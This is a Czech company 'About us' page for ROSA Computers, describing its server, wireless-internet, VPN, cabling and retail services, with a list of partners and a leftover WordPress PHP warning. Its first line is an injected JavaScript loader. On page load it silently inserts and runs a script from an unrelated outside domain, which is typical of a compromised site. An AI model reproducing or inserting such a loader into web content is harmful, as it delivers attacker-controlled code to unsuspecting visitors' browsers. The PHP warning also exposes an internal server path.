;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); O nás
5.12.2023

O nás

Společnost ROSA Computers je dodavatelem kompletních řešení na bázi Windows a LINUX serverů. V našem portfoliu jsou jak instalace a konfigurace Windows serverů pro řízení domén, SQL servery a servery pro obsluhu internetových služeb.

Snažíme se však preferovat řešení na bázi GNU/Linux, vzhledem k vysoké škálovatelnosti, široké konfigurovatelnosti a absolutní spolehlivosti řešení na této platformě.

V oblasti Linux serverů naše společnost dosahuje skvělých výsledků, které jsou podpořeny provozem vlastních serverů v sítích RCnet.

Síť RCnet představuje veškeré aktivity ROSA Computers v oblasti přístupu k internetu.Již od roku 2003 se zabýváme komplexním řešením firemní komunikace a zejména poskytováním bezdrátového připojení k Internetu a realizací VPN (Virtuálních privátních sítí).

Další oblastí působnosti naší firmy je budování strukturované kabelážekamerových a zabezpečovacích systémů.

Dále pro naše zákazníky provozujeme maloobchodní prodejnu s elektronikou, výpočetní a IT technikou a příslušenstvím.


Jsme partnery těchto obchodních sítí:

Ha-loo volání

SWS Gold Partner
Repas Refurbished

Comfor Stores
Nákup na splátky Essox

Síť IT prodejen eD profi


Deprecated: Soubor Šablona neobsahuje souboru footer.php je od verze 3.0.0 zastaralý a není k dispozici žádná alternativa. Používejte soubor footer.php ve vaší šabloně. in /data/webs/rosacom.cz/www/wp-includes/functions.php on line 6031